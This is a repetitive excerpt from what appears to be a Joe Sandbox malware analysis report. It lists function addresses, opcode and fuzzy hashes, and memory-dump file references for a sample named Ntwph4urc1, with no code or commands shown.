                                            • Opcode ID: 1f93f02acdb1517f64f5f5eec4f3cc76509de4af37fefe8e348a9096210dc040
                                            • Instruction ID: 3390a2a398a401586dfb3224a25ea6b3f62983fba6a245990c33046918db4f17
                                            • Opcode Fuzzy Hash: 1f93f02acdb1517f64f5f5eec4f3cc76509de4af37fefe8e348a9096210dc040
                                            • Instruction Fuzzy Hash: A6900261B0160502D10171988508616004F47D0251F95C063A2034519ECA298A96A131
                                            Function 36992EA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 729d346ef74fdf95e3345bc881e5e66819f6833418680abb78c54ee563018868
                                            • Instruction ID: 318174a203018bc570f12a5507865b5d0a15f1ae05173cb20027630ceb3fb4df
                                            • Opcode Fuzzy Hash: 729d346ef74fdf95e3345bc881e5e66819f6833418680abb78c54ee563018868
                                            • Instruction Fuzzy Hash: 439002B170160402D14071988508746004A47D0311F55C052A6074518E865D8ED96665
                                            Function 36992EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 467effc831146a4b4f8413bd74ce8d262fbd0815b7a82744fc99c7dd14dd8341
                                            • Instruction ID: 6da9087857239f8972caca79b93c8859fef4eba3ef518b70a8c42bcabd3ad721
                                            • Opcode Fuzzy Hash: 467effc831146a4b4f8413bd74ce8d262fbd0815b7a82744fc99c7dd14dd8341
                                            • Instruction Fuzzy Hash: 199002A1701A0403D14075988908607004A47D0312F55C052A3074519E8A2D8D556135
                                            Function 36992E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 314c6553281457dd269d31f854c99378d5acca8d1d476e00b68e1954d3b213dc
                                            • Instruction ID: e1df5fdf1ed058ef51951e8c1bb89c1f85d73900abaede9d58848d410484a3c4
                                            • Opcode Fuzzy Hash: 314c6553281457dd269d31f854c99378d5acca8d1d476e00b68e1954d3b213dc
                                            • Instruction Fuzzy Hash: A090026170160402D10271988518606004E87D1355F95C053E2434519D86298A57A132
                                            Function 36992F90 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ff87987347cf9e9396d3eec4ad9c2ba7d9ce3d4e0bf6a632c21806a07472c1b
                                            • Instruction ID: 470dd66de9d3072735c3a844acaffe99e220df0b0f1e586ff9bb9eef89775302
                                            • Opcode Fuzzy Hash: 7ff87987347cf9e9396d3eec4ad9c2ba7d9ce3d4e0bf6a632c21806a07472c1b
                                            • Instruction Fuzzy Hash: 21900271701A0402D1007198891870B004A47D0312F55C052A2174519D862989556571
                                            Function 36992FB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf803062d77de44f73fe1ccce28f569e33b1f6e33780b68f1f0b48d3c7925a80
                                            • Instruction ID: 77bb1a87d12aa591b8c1b7426469184e56cbbbce0a5ed1f0272a0e9e0c11a648
                                            • Opcode Fuzzy Hash: cf803062d77de44f73fe1ccce28f569e33b1f6e33780b68f1f0b48d3c7925a80
                                            • Instruction Fuzzy Hash: 8F900261B0160042414071A8C948906404A6BE1221755C162A19A8514D855D89695665
                                            Function 36992FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 121856a106862a725ebdef52ae10b1e0f08510b1f512262f7710eafabf75b960
                                            • Instruction ID: b1515c5cf2f7179485c81c6f68b098bccd65e5d8e23017298a458b5cdbacf085
                                            • Opcode Fuzzy Hash: 121856a106862a725ebdef52ae10b1e0f08510b1f512262f7710eafabf75b960
                                            • Instruction Fuzzy Hash: 99900271701A0402D1007198890C747004A47D0312F55C052A6174519E8669C9956531
                                            Function 36992FE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44449d4862e5005205479fbc5236f8ccd0f45115881f62199826306147a222fd
                                            • Instruction ID: a9ffc0bf965c9108eedd4ab34be576000e312fe267d6baa0cec53908143c5c67
                                            • Opcode Fuzzy Hash: 44449d4862e5005205479fbc5236f8ccd0f45115881f62199826306147a222fd
                                            • Instruction Fuzzy Hash: 5A900261711E0042D20075A88D18B07004A47D0313F55C156A1164518CC91989655521
                                            Function 36992F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59fb73b0e5376ab417204abf57f77f93fc0c92b93060b169c5c621079709db63
                                            • Instruction ID: 5a17ccf5d1daa3ad4a3328edaee27b422f5b1651142e24d98394a33e1bcc3976
                                            • Opcode Fuzzy Hash: 59fb73b0e5376ab417204abf57f77f93fc0c92b93060b169c5c621079709db63
                                            • Instruction Fuzzy Hash: E59002A174160442D10071988518B06004A87E1311F55C056E2074518D861DCD566126
                                            Function 36992F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce3d22fd23ca730f857a8e105d2f332ef892de9e0b1529e6899ca502b27435c9
                                            • Instruction ID: 85a1390281b529cb91e2be68f17e43579d89e31a1f68fb07580041316c170b4e
                                            • Opcode Fuzzy Hash: ce3d22fd23ca730f857a8e105d2f332ef892de9e0b1529e6899ca502b27435c9
                                            • Instruction Fuzzy Hash: BC9002A171160042D10471988508706008A47E1211F55C053A3164518CC52D8D655125
                                            Function 36992CA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebd9e03274c262e13cabf137c92ee72bf7b9f363b7fb386bc4e84d2495a623e1
                                            • Instruction ID: d909986ce7bd3167e5db4e2a8f2d6acf8a6565163fb6c1c8da3c5e18e4f94e28
                                            • Opcode Fuzzy Hash: ebd9e03274c262e13cabf137c92ee72bf7b9f363b7fb386bc4e84d2495a623e1
                                            • Instruction Fuzzy Hash: 2090027170160402D10075D8950C646004A47E0311F55D052A6034519EC66989956131
                                            Function 36992CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84ada34ad6fba11d1c03fd57e7b7d4dc45b434440e7589facadb8a9a8ceeb877
                                            • Instruction ID: ba0eea74ee76dc4b23d27e012fb6f6b5f513e9b03ef83951be124cffaf63657a
                                            • Opcode Fuzzy Hash: 84ada34ad6fba11d1c03fd57e7b7d4dc45b434440e7589facadb8a9a8ceeb877
                                            • Instruction Fuzzy Hash: C3900261B0560402D1407198951C706005A47D0211F55D052A1034518DC65D8B5966A1
                                            Function 36992CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38de6e257af525511858a7aa2f65a7955e49dcacca0398ce8f92f8d15783e6c8
                                            • Instruction ID: 9ded48169b6ba0351cdff6593cbc110a2d2a12acc9ac6d8f6df3d9aa26e3fe2a
                                            • Opcode Fuzzy Hash: 38de6e257af525511858a7aa2f65a7955e49dcacca0398ce8f92f8d15783e6c8
                                            • Instruction Fuzzy Hash: 9690027170160403D1007198960C707004A47D0211F55D452A143451CDD65A89556121
                                            Function 36992C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04a6d2dcb62002dc0a4a04c5bf79a7ec4b52bc8d255182dacc3920575857a124
                                            • Instruction ID: 48ae0584c65f47da265f9aad09ec0a3b36b8a01c01ffac2b2223bbc46df31378
                                            • Opcode Fuzzy Hash: 04a6d2dcb62002dc0a4a04c5bf79a7ec4b52bc8d255182dacc3920575857a124
                                            • Instruction Fuzzy Hash: 6F90027170168802D1107198C50874A004A47D0311F59C452A543461CD869989957121
                                            Function 36992C60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32444c28429f0a234425647b9be68c9bc02ebe065a5f0dfc484fd75738583fd7
                                            • Instruction ID: 4344da8a442ea84dc7b00f3c39716a52b56f439657da31734d6012c8d8a7783b
                                            • Opcode Fuzzy Hash: 32444c28429f0a234425647b9be68c9bc02ebe065a5f0dfc484fd75738583fd7
                                            • Instruction Fuzzy Hash: 6490027170160842D10071988508B46004A47E0311F55C057A1134618D8619C9557521
                                            Function 36992DB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2337288a99fa4424c8c38f9ed072aac53b30fa16cdc1fbc79e51dc8ebc352336
                                            • Instruction ID: 5547894dfd1223782297d6e8677466836bfd9766f7e642f83548620bc3fd277a
                                            • Opcode Fuzzy Hash: 2337288a99fa4424c8c38f9ed072aac53b30fa16cdc1fbc79e51dc8ebc352336
                                            • Instruction Fuzzy Hash: FC90027174160402D14171988508606004E57D0251F95C053A1434518E86598B5AAA61
                                            Function 36992DD0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6869dcd37c5d8d3971437bdf16a9706af643d890cf74260592c70bee0e2f50fb
                                            • Instruction ID: 2d7469c67c3bdef864eb9d08bbf6a8e8c150ff73b69a9b471c439842bbda3adb
                                            • Opcode Fuzzy Hash: 6869dcd37c5d8d3971437bdf16a9706af643d890cf74260592c70bee0e2f50fb
                                            • Instruction Fuzzy Hash: 07900261742641525545B1988508507404B57E0251795C053A2424914C852A995AD621
                                            Function 36992D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f70fa34739d14e8cd54a9026d9486bd37b9624a7b08efbb3da3aaecbdab89b59
                                            • Instruction ID: fb14f57ec6d5944b7ced51f498da2d849604104b60a074258d3d8fe0dd431027
                                            • Opcode Fuzzy Hash: f70fa34739d14e8cd54a9026d9486bd37b9624a7b08efbb3da3aaecbdab89b59
                                            • Instruction Fuzzy Hash: DA90026971360002D1807198950C60A004A47D1212F95D456A102551CCC919896D5321
                                            Function 36992D00 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebf8ba8ebd4215f667f10c55dc735b3520696e2fca42f5a5172737a1b6a7fd0d
                                            • Instruction ID: ce8cdf2afbe79b0fc3ea2eec2d89ae7e858aae5351ed6d84a285691d670f8956
                                            • Opcode Fuzzy Hash: ebf8ba8ebd4215f667f10c55dc735b3520696e2fca42f5a5172737a1b6a7fd0d
                                            • Instruction Fuzzy Hash: 0F90026170564442D1007598950CA06004A47D0215F55D052A2074559DC6398955A131
                                            Function 36992D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab4aa9b999e46e96b1da053ba3418cdba0fb8228872a983a4189a5084856e335
                                            • Instruction ID: 41ddfaa68b69a03edd5cb69b8f332eae1ae9b187c9ad08da69e33061e8a4f565
                                            • Opcode Fuzzy Hash: ab4aa9b999e46e96b1da053ba3418cdba0fb8228872a983a4189a5084856e335
                                            • Instruction Fuzzy Hash: 7D90026170160003D1407198951C606404A97E1311F55D052E1424518CD919895A5222
                                            Function 36992AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cac56d892b27095eadceb8d40efd75e0a971ea9cb207b4144cba518c0e1067b9
                                            • Instruction ID: c1c0948cd025835a33364ffd68164d6b7993a41f3bcff2fbc23eeabc142ef5e2
                                            • Opcode Fuzzy Hash: cac56d892b27095eadceb8d40efd75e0a971ea9cb207b4144cba518c0e1067b9
                                            • Instruction Fuzzy Hash: 179002E1701740924500B298C508B0A454A47E0211B55C057E2064524CC52989559135
                                            Function 36992AD0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9de4003468effa5460b5f42bd0527ec9d4b3bf4fcc36335c9a088055183a89c
                                            • Instruction ID: aafd1029a64c9e75418eb606001e453af7662e4bf78f854c518888c7a103210c
                                            • Opcode Fuzzy Hash: b9de4003468effa5460b5f42bd0527ec9d4b3bf4fcc36335c9a088055183a89c
                                            • Instruction Fuzzy Hash: 22900265711600030105B5984708507008B47D5361355C062F2025514CD62589655121
                                            Function 36992AF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a63de9b3a854a35717840df837ae6e63c3522f81a9b1820594f3007a8f46517
                                            • Instruction ID: 360c2c17b16119dc3d2f694499311bf3be6bf2f08a05501b23aa2b6434ca145d
                                            • Opcode Fuzzy Hash: 9a63de9b3a854a35717840df837ae6e63c3522f81a9b1820594f3007a8f46517
                                            • Instruction Fuzzy Hash: 16900265721600020145B598470850B048A57D6361395C056F2426554CC62589695321
                                            Function 36992B80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db8518b0ddb42439de2cf9813e747ebf9b431fec030410a0d40a54fd8e54534
                                            • Instruction ID: 319e9499758c3db8f9361f4b3023f33b9b89c77a1cb3477a1a644c1a5b2844f1
                                            • Opcode Fuzzy Hash: 0db8518b0ddb42439de2cf9813e747ebf9b431fec030410a0d40a54fd8e54534
                                            • Instruction Fuzzy Hash: 9190027170160802D10471988908686004A47D0311F55C052A7034619E966989957131
                                            Function 36992BA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 694ebf98a8a623fa5cb2498cc4298804d873aca2c1de42ad3c160a64d51bf283
                                            • Instruction ID: fea0ac5d1892c7c6a0cbae71aa727c6b359435083aae3c309db1296572430ce3
                                            • Opcode Fuzzy Hash: 694ebf98a8a623fa5cb2498cc4298804d873aca2c1de42ad3c160a64d51bf283
                                            • Instruction Fuzzy Hash: 53900271B0560802D15071988518746004A47D0311F55C052A1034618D87598B5976A1
                                            Function 36992BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
